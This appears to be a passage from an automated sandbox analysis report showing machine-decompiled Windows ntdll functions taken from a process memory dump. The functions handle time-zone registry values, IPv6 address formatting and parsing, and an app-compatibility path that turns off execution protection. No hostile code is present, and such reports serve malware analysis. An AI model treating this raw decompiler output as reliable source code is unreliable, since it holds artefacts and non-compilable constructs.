                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                                              • Instruction ID: 5ab7665fc7cde54beed12ebbd0d115cb4ab6791bda4bcc5c262023b1d487ed70
                                                              • Opcode Fuzzy Hash: 208b22777f0f102398881cc315b81a742f43ec2479715bf5b2b875e574178b3b
                                                              • Instruction Fuzzy Hash: 11F1F5B6D00209EFCF11DFA4CA859EEBBB8FF08300F14456AE505A7211EB359E45DB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AD822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 95%
                                                              			E00AD822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E00AF5A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E00AF5A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E00A97DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E00AD810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E00AD810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E00A3F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}













                                                              0x00ad8231
                                                              0x00ad8235
                                                              0x00ad823a
                                                              0x00ad8245
                                                              0x00ad824b
                                                              0x00ad825c
                                                              0x00ad8262
                                                              0x00ad8263
                                                              0x00ad8266
                                                              0x00ad8268
                                                              0x00000000
                                                              0x00ad826a
                                                              0x00ad8270
                                                              0x00ad8275
                                                              0x00ad8277
                                                              0x00ad8295
                                                              0x00ad8297
                                                              0x00ad838d
                                                              0x00ad8391
                                                              0x00ad83a9
                                                              0x00ad83ab
                                                              0x00ad83ad
                                                              0x00ad83b6
                                                              0x00ad83b9
                                                              0x00000000
                                                              0x00ad83b9
                                                              0x00ad829d
                                                              0x00ad829d
                                                              0x00ad82b6
                                                              0x00ad82b8
                                                              0x00000000
                                                              0x00ad82be
                                                              0x00ad82c0
                                                              0x00ad82d5
                                                              0x00ad82d7
                                                              0x00000000
                                                              0x00ad82dd
                                                              0x00ad82f3
                                                              0x00ad82f5
                                                              0x00000000
                                                              0x00ad82fb
                                                              0x00ad8317
                                                              0x00ad8319
                                                              0x00000000
                                                              0x00ad831b
                                                              0x00ad8332
                                                              0x00ad8334
                                                              0x00000000
                                                              0x00ad8336
                                                              0x00ad834f
                                                              0x00ad8351
                                                              0x00000000
                                                              0x00ad8353
                                                              0x00ad8353
                                                              0x00ad835a
                                                              0x00000000
                                                              0x00ad835c
                                                              0x00ad8378
                                                              0x00ad837a
                                                              0x00ad837c
                                                              0x00ad8385
                                                              0x00ad8388
                                                              0x00ad83bc
                                                              0x00ad83cf
                                                              0x00ad83cf
                                                              0x00ad837c
                                                              0x00ad835a
                                                              0x00ad8351
                                                              0x00ad8334
                                                              0x00ad8319
                                                              0x00ad82f5
                                                              0x00ad82d7
                                                              0x00ad82b8
                                                              0x00ad83d4
                                                              0x00ad83d9
                                                              0x00ad83d9
                                                              0x00ad8277
                                                              0x00ad824d
                                                              0x00ad824d
                                                              0x00ad824d
                                                              0x00ad824d
                                                              0x00ad83df

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: _wcsnlen
                                                              • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                              • API String ID: 3628947076-1387797911
                                                              • Opcode ID: 7c5c1557248890d3817cf1ac6c15bac1c61e98b142bffdc3d893e54a37e3031b
                                                              • Instruction ID: 55914cb78dfe7819f5786f9b474f5e601d7197991163e060ce595098e83ad98d
                                                              • Opcode Fuzzy Hash: 7c5c1557248890d3817cf1ac6c15bac1c61e98b142bffdc3d893e54a37e3031b
                                                              • Instruction Fuzzy Hash: 1441C975340308BEEB019A91CE42FDF77ACAF04B44F100213BB06D9291DBB4DB148BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A813CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 38%
                                                              			E00A813CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00A77707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa42926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00A77707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa49cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00A77707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00A77707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00A77707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00A77707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                              0x00a813d5
                                                              0x00a813d9
                                                              0x00a813dc
                                                              0x00a813de
                                                              0x00a813e1
                                                              0x00a813e8
                                                              0x00a813ee
                                                              0x00aae8fd
                                                              0x00000000
                                                              0x00aae921
                                                              0x00aae921
                                                              0x00aae928
                                                              0x00aae982
                                                              0x00aae98a
                                                              0x00000000
                                                              0x00aae99a
                                                              0x00aae99e
                                                              0x00aae9a3
                                                              0x00aae9a8
                                                              0x00aae9b9
                                                              0x00aae978
                                                              0x00000000
                                                              0x00aae978
                                                              0x00aae98a
                                                              0x00aae92a
                                                              0x00aae931
                                                              0x00aae944
                                                              0x00aae944
                                                              0x00aae950
                                                              0x00aae954
                                                              0x00aae959
                                                              0x00aae95e
                                                              0x00aae963
                                                              0x00aae970
                                                              0x00000000
                                                              0x00aae975
                                                              0x00aae93b
                                                              0x00aae980
                                                              0x00000000
                                                              0x00aae980
                                                              0x00aae942
                                                              0x00aae94b
                                                              0x00000000
                                                              0x00aae94b
                                                              0x00000000
                                                              0x00aae942
                                                              0x00a813f4
                                                              0x00a813f4
                                                              0x00a813f9
                                                              0x00a813fc
                                                              0x00a813ff
                                                              0x00a81406
                                                              0x00aae9cc
                                                              0x00aae9d2
                                                              0x00aae9d2
                                                              0x00aae9cc
                                                              0x00a8140c
                                                              0x00a81411
                                                              0x00a81431
                                                              0x00a8143a
                                                              0x00a8143c
                                                              0x00a8143f
                                                              0x00a8143f
                                                              0x00a81442
                                                              0x00a81447
                                                              0x00a814a8
                                                              0x00a814ac
                                                              0x00aae9e2
                                                              0x00aae9e7
                                                              0x00aae9ec
                                                              0x00aaea05
                                                              0x00aaea05
                                                              0x00000000
                                                              0x00a81449
                                                              0x00000000
                                                              0x00a81449
                                                              0x00a8144c
                                                              0x00a81459
                                                              0x00a81462
                                                              0x00a81469
                                                              0x00a8146a
                                                              0x00a81470
                                                              0x00a81473
                                                              0x00a81476
                                                              0x00a81476
                                                              0x00a81490
                                                              0x00a81495
                                                              0x00a8138e
                                                              0x00a81390
                                                              0x00a81397
                                                              0x00a81398
                                                              0x00a81399
                                                              0x00a813a1
                                                              0x00a813a4
                                                              0x00a813a4
                                                              0x00a81498
                                                              0x00a8149c
                                                              0x00a8149f
                                                              0x00a814a2
                                                              0x00000000
                                                              0x00000000
                                                              0x00a814a4
                                                              0x00000000
                                                              0x00a814a4
                                                              0x00a81413
                                                              0x00a81415
                                                              0x00a81416
                                                              0x00a81419
                                                              0x00a8141c
                                                              0x00a81422
                                                              0x00a813b7
                                                              0x00a813bc
                                                              0x00a813bf
                                                              0x00a813bf
                                                              0x00a813c2
                                                              0x00a81424
                                                              0x00a81424
                                                              0x00a81424
                                                              0x00a81427
                                                              0x00a8142b
                                                              0x00a8142c
                                                              0x00a8142c
                                                              0x00a8142c
                                                              0x00000000
                                                              0x00a8141c
                                                              0x00a81411

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                                              • Instruction ID: 9bb5ff0cbf4bea62b3719ec61a768380f95b12e9dd7b2d19e37c31db67ad464c
                                                              • Opcode Fuzzy Hash: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                                              • Instruction Fuzzy Hash: 4A6127B5D00755AACB24EF59C8808BFBBB9EFD5300B54C52DF4DA4B581D334AA41CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A77EFD, Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E00A77EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xb22088; // 0x745f356a
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00A77F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00A93F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A4DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xb24218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00A93F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00A50D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00A93F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00A58375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00A93F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00ABE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00A93F92();
					_t38 = 1;
					L2:
					return E00A4E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                              0x00a77f08
                                                              0x00a77f0f
                                                              0x00a77f12
                                                              0x00a77f1b
                                                              0x00a77f31
                                                              0x00a93ead
                                                              0x00a93eb4
                                                              0x00000000
                                                              0x00000000
                                                              0x00a93eba
                                                              0x00a93ecd
                                                              0x00a93ed2
                                                              0x00a93ee1
                                                              0x00a93ee7
                                                              0x00a93eec
                                                              0x00a93f12
                                                              0x00a93f18
                                                              0x00a93f1a
                                                              0x00000000
                                                              0x00000000
                                                              0x00a93f20
                                                              0x00a93f26
                                                              0x00a93f28
                                                              0x00000000
                                                              0x00000000
                                                              0x00a93f2e
                                                              0x00a93f30
                                                              0x00000000
                                                              0x00000000
                                                              0x00a93f3a
                                                              0x00a93f3b
                                                              0x00a93f53
                                                              0x00a93f64
                                                              0x00a93f69
                                                              0x00a93f6c
                                                              0x00a93f6d
                                                              0x00a93f6f
                                                              0x00a9e304
                                                              0x00a9e30f
                                                              0x00a9e315
                                                              0x00a9e31e
                                                              0x00a9e321
                                                              0x00a9e327
                                                              0x00a9e329
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9e32f
                                                              0x00a9e32f
                                                              0x00a9e337
                                                              0x00a9e33a
                                                              0x00a9e33b
                                                              0x00a9e33d
                                                              0x00a9e33f
                                                              0x00a9e341
                                                              0x00a9e341
                                                              0x00a9e34e
                                                              0x00a9e353
                                                              0x00a9e358
                                                              0x00a9e35d
                                                              0x00a9e35f
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9e365
                                                              0x00a9e365
                                                              0x00a9e368
                                                              0x00a9e36e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a9e374
                                                              0x00a9e32f
                                                              0x00a93f75
                                                              0x00a93f7a
                                                              0x00a93f7c
                                                              0x00a93f7e
                                                              0x00a93f86
                                                              0x00a77f39
                                                              0x00a77f47
                                                              0x00a77f47
                                                              0x00a77f37
                                                              0x00a77f37
                                                              0x00000000

                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A93F12
                                                              Strings
                                                              • j5_t, xrefs: 00A77F08
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A93F75
                                                              • (&y, xrefs: 00A77F1E
                                                              • Execute=1, xrefs: 00A93F5E
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A93EC4
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A93F4A
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A9E2FB
                                                              • ExecuteOptions, xrefs: 00A93F04
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A9E345
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.483166029.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                              • Associated: 00000004.00000002.483127572.0000000000A20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483372699.0000000000B10000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483377274.0000000000B20000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483382029.0000000000B24000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483386374.0000000000B27000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483390637.0000000000B30000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000004.00000002.483434447.0000000000B90000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: (&y$CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$j5_t
                                                              • API String ID: 3901378454-4080450086
                                                              • Opcode ID: c582499941d2d6140386de3e8b297140bff1a7e0aeb818a64e5b1555834f4239
                                                              • Instruction ID: 2a784f9344ce5951899d836ac6aa1627647f2453516e066c3cc4246061c2dc92
                                                              • Opcode Fuzzy Hash: c582499941d2d6140386de3e8b297140bff1a7e0aeb818a64e5b1555834f4239
                                                              • Instruction Fuzzy Hash: 2B41B672A8021CBADF24DB94DDC6FEE73FCAB55700F0045A9F509E6081EA709B45CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A80B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A80B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00A58980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A4DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00A80CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00A80CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00A806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00A806BA(_t135, _t178) == 0 || E00A80A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00A80CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00A80CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00A806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00A806BA(_t124, _t142) == 0 || E00A80A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                              0x00a80b21
                                                              0x00a80b24
                                                              0x00a80b27
                                                              0x00a80b2a
                                                              0x00a80b2d
                                                              0x00a80b30
                                                              0x00a80b33
                                                              0x00a80b36
                                                              0x00a80b39
                                                              0x00a80b3e
                                                              0x00a80c65
                                                              0x00a80c68
                                                              0x00a80c6a
                                                              0x00a80c6f
                                                              0x00aaeb42
                                                              0x00000000
                                                              0x00000000
                                                              0x00aaeb48
                                                              0x00aaeb48
                                                              0x00a80c75
                                                              0x00a80c7a
                                                              0x00aaeb54
                                                              0x00000000
